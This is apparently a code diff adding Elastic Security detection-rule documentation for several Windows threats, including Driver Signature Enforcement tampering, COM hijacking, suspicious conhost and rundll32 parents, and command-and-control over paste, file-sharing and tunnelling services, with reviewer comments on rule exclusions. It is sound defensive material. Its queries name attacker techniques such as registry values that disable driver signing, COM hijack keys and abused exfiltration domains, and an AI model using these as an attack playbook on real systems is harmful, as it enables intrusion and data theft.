Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. + +This protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security. 
+ +This rule identifies registry modifications that can disable DSE. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Use Osquery and endpoint driver events (`event.category = "driver"`) to investigate if suspicious drivers were loaded into the system after the registry was modified. + - !{osquery{"label":"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \"Microsoft\" AND signed == \"1\")\n"}} + - !{osquery{"label":"Osquery - Retrieve All Unsigned Drivers with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \"0\"\n"}} +- Identify the driver's `Device Name` and `Service Name`. +- Check for alerts from the rules specified in the `Related Rules` section. 
+ +### False positive analysis + +- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk. + +### Related Rules + +- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9 +- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa +- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.) +- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed. + - This can be done via PowerShell `Remove-Service` cmdlet. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Remove and block malicious artifacts identified during triage. +- Ensure that the Driver Signature Enforcement is enabled on the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type : ("creation", "change") and +( + registry.path : "HKEY_USERS\\*\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing\\BehaviorOnFailedVerify" and + registry.value: "BehaviorOnFailedVerify" and + registry.data.strings : ("0", "0x00000000", "1", "0x00000001") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Subvert Trust Controls +** ID: T1553 +** Reference URL: https://attack.mitre.org/techniques/T1553/ +* Sub-technique: +** Name: Code Signing Policy Modification +** ID: T1553.006 +** Reference URL: https://attack.mitre.org/techniques/T1553/006/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-execution-via-solarwinds-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-execution-via-solarwinds-process.asciidoc new file mode 100644 index 0000000000..3adc4b9a95 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-execution-via-solarwinds-process.asciidoc 
@@ -0,0 +1,103 @@ +[[prebuilt-rule-8-10-5-command-execution-via-solarwinds-process]] +=== Command Execution via SolarWinds Process + +A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html +* https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20FILEWRITES%20(METHODOLOGY).ioc + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Initial Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.name: ("cmd.exe", "powershell.exe") and +process.parent.name: ( + "ConfigurationWizard*.exe", + "NetflowDatabaseMaintenance*.exe", + "NetFlowService*.exe", + "SolarWinds.Administration*.exe", + "SolarWinds.Collector.Service*.exe", + "SolarwindsDiagnostics*.exe" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: 
https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Supply Chain Compromise +** ID: T1195 +** Reference URL: https://attack.mitre.org/techniques/T1195/ +* Sub-technique: +** Name: Compromise Software Supply Chain +** ID: T1195.002 +** Reference URL: https://attack.mitre.org/techniques/T1195/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32.asciidoc new file mode 100644 index 0000000000..4c769c52b0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32.asciidoc 
@@ -0,0 +1,106 @@ +[[prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32]] +=== Command Shell Activity Started via RunDLL32 + +Identifies command shell activity started via RunDLL32, which is commonly abused by attackers to host malicious code. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Credential Access +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : ("cmd.exe", "powershell.exe") and + process.parent.name : "rundll32.exe" and process.parent.command_line != null and + /* common FPs can be added here */ + not process.parent.args : ("C:\\Windows\\System32\\SHELL32.dll,RunAsNewUser_RunDLL", + "C:\\WINDOWS\\*.tmp,zzzzInvokeManagedCustomActionOutOfProc") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** 
Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-component-object-model-hijacking.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-component-object-model-hijacking.asciidoc new file mode 100644 index 0000000000..8bfc5552f7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-component-object-model-hijacking.asciidoc 
@@ -0,0 +1,177 @@ +[[prebuilt-rule-8-10-5-component-object-model-hijacking]] +=== Component Object Model Hijacking + +Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Component Object Model Hijacking + +Adversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate other alerts associated with the user/host during the past 48 hours. 
+- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Retrieve the file referenced in the registry and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- Some Microsoft executables will reference the LocalServer32 registry key value for the location of external COM objects. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + /* not necessary but good for filtering privileged installations */ + user.domain != "NT AUTHORITY" and + ( + ( + registry.path : ("HK*\\InprocServer32\\", "\\REGISTRY\\*\\InprocServer32\\") and + registry.data.strings: ("scrobj.dll", "C:\\*\\scrobj.dll") and + not registry.path : "*\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\*" + ) or + + /* in general COM Registry changes on Users Hive is less noisy and worth alerting */ + (registry.path : ( + "HKEY_USERS\\*\\InprocServer32\\", + "HKEY_USERS\\*\\LocalServer32\\", + "HKEY_USERS\\*\\DelegateExecute*", + "HKEY_USERS\\*\\TreatAs*", + "HKEY_USERS\\*\\ScriptletURL*", + "\\REGISTRY\\USER\\*\\InprocServer32\\", + "\\REGISTRY\\USER\\*\\LocalServer32\\", + "\\REGISTRY\\USER\\*\\DelegateExecute*", + "\\REGISTRY\\USER\\*\\TreatAs*", + "\\REGISTRY\\USER\\*\\ScriptletURL*" + ) and not + ( + process.executable : "?:\\Program Files*\\Veeam\\Backup and Replication\\Console\\veeam.backup.shell.exe" and + registry.path : ( + "HKEY_USERS\\S-1-*_Classes\\CLSID\\*\\LocalServer32\\", + "\\REGISTRY\\USER\\S-1-*_Classes\\CLSID\\*\\LocalServer32\\")) + ) or + + ( + registry.path : ("HKLM\\*\\InProcServer32\\*", "\\REGISTRY\\MACHINE\\*\\InProcServer32\\*") and + registry.data.strings : ("*\\Users\\*", "*\\ProgramData\\*") + ) + ) and + + /* removes false-positives generated by OneDrive and Teams */ + not process.name: ("OneDrive.exe", "OneDriveSetup.exe", "FileSyncConfig.exe", "Teams.exe") and + + /* Teams DLL loaded by 
regsvr */ + not (process.name: "regsvr32.exe" and registry.data.strings : "*Microsoft.Teams.*.dll") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Component Object Model Hijacking +** ID: T1546.015 +** Reference URL: https://attack.mitre.org/techniques/T1546/015/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Component Object Model Hijacking +** ID: T1546.015 +** Reference URL: https://attack.mitre.org/techniques/T1546/015/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process.asciidoc new file mode 100644 index 0000000000..94edb43d44 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process.asciidoc 
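Review bot: In the Component Object Model Hijacking query, the carve-out `not process.name: ("OneDrive.exe", "OneDriveSetup.exe", "FileSyncConfig.exe", "Teams.exe")` exempts a writer on file name alone, whereas the Veeam exception just above it is pinned to a full `process.executable` path and a specific key pattern. Pair the names with `process.code_signature.subject_name` and `process.code_signature.trusted == true`, as the Discord and Firefox exceptions in the Connection to Commonly Abused Web Services rule in this same patch do, or pin them to the executable path. Secondary point: the global `user.domain != "NT AUTHORITY"` filter is AND-ed over all three branches, so it also suppresses the HKLM `InProcServer32` branch when the writer runs as SYSTEM or a service account, which is exactly the privilege-escalation case the rule is tagged for; the comment "not necessary but good for filtering privileged installations" should spell out that trade-off, or the filter should be scoped to the HKEY_USERS branch only.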
@@ -0,0 +1,145 @@ +[[prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process]] +=== Conhost Spawned By Suspicious Parent Process + +Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Conhost Spawned By Suspicious Parent Process + +The Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as the classic Windows user interface for working with command-line applications. + +Attackers often rely on custom shell implementations to avoid using built-in command interpreters like `cmd.exe` and `PowerShell.exe` and bypass application allowlisting and security features. Attackers commonly inject these implementations into legitimate system processes. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. +- Retrieve the parent process executable and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Related rules + +- Suspicious Process from Conhost - 28896382-7d4f-4d50-9b72-67091901fd26 +- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : "conhost.exe" and + process.parent.name : ("lsass.exe", "services.exe", "smss.exe", "winlogon.exe", "explorer.exe", "dllhost.exe", "rundll32.exe", + "regsvr32.exe", "userinit.exe", "wininit.exe", "spoolsv.exe", "ctfmon.exe") and + not (process.parent.name : "rundll32.exe" and + process.parent.args : ("?:\\Windows\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc", + "?:\\WINDOWS\\system32\\PcaSvc.dll,PcaPatchSdbTask", + "?:\\WINDOWS\\system32\\davclnt.dll,DavSetCookie")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: 
https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services.asciidoc new file mode 100644 index 0000000000..4511964720 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services.asciidoc 
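Review bot: In the Conhost Spawned By Suspicious Parent Process investigation guide, the step "Retrieve the parent process executable and determine if it is malicious: Use a private sandboxed malware analysis system" will not find anything in the scenario the rule describes: the listed parents (`lsass.exe`, `services.exe`, `winlogon.exe`, ...) are legitimate signed system binaries, and the description says the alert "could be indicative of code injection", so the malicious code lives only in the parent's memory. The guide should direct the analyst to acquire the parent process memory and look for unbacked executable regions or unexpected loaded modules, with the sandbox step reserved for any dropper found that way. Also, the false positive section says "This activity is unlikely to happen legitimately" but does not mention the three `rundll32.exe` parents the query already filters (`MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc`, `PcaSvc.dll,PcaPatchSdbTask`, `davclnt.dll,DavSetCookie`); listing them there shows analysts what is filtered and gives a template for further exceptions.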
@@ -0,0 +1,207 @@ +[[prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services]] +=== Connection to Commonly Abused Web Services + +Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Connection to Commonly Abused Web Services + +Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. + +This rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control. 
+ +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Verify whether the digital signature exists in the executable. +- Identify the operation type (upload, download, tunneling, etc.). +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. 
+ - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +network where host.os.type == "windows" and network.protocol == "dns" and + process.name != null and user.id not in ("S-1-5-18", "S-1-5-19", "S-1-5-20") and + /* Add new WebSvc domains here */ + dns.question.name : + ( + "raw.githubusercontent.*", + "*.pastebin.*", + "*drive.google.*", + "*docs.live.*", + "*api.dropboxapi.*", + "*dropboxusercontent.*", + "*onedrive.*", + "*4shared.*", + "*.file.io", + "*filebin.net", + "*slack-files.com", + "*ghostbin.*", + "*ngrok.*", + "*portmap.*", + "*serveo.net", + "*localtunnel.me", + "*pagekite.me", + "*localxpose.io", + "*notabug.org", + "rawcdn.githack.*", + "paste.nrecom.net", + "zerobin.net", + "controlc.com", + "requestbin.net", + "cdn.discordapp.com", + "discordapp.com", + "discord.com", + "script.google.com", + "script.googleusercontent.com" + ) and + /* Insert noisy false positives here */ + not ( + process.executable : ( + "?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\Windows\\System32\\WWAHost.exe", + "?:\\Windows\\System32\\smartscreen.exe", + "?:\\Windows\\System32\\MicrosoftEdgeCP.exe", + "?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\MsMpEng.exe", + 
"?:\\Users\\*\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe", + "?:\\Users\\*\\AppData\\Local\\Programs\\Fiddler\\Fiddler.exe", + "?:\\Users\\*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe", + "?:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe", + "?:\\Windows\\system32\\mobsync.exe", + "?:\\Windows\\SysWOW64\\mobsync.exe" + ) or + + /* Discord App */ + (process.name : "Discord.exe" and (process.code_signature.subject_name : "Discord Inc." and + process.code_signature.trusted == true) and dns.question.name : ("discord.com", "cdn.discordapp.com", "discordapp.com") + ) or + + /* MS Sharepoint */ + (process.name : "Microsoft.SharePoint.exe" and (process.code_signature.subject_name : "Microsoft Corporation" and + process.code_signature.trusted == true) and dns.question.name : "onedrive.live.com" + ) or + + /* Firefox */ + (process.name : "firefox.exe" and (process.code_signature.subject_name : "Mozilla Corporation" and + process.code_signature.trusted == true) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: 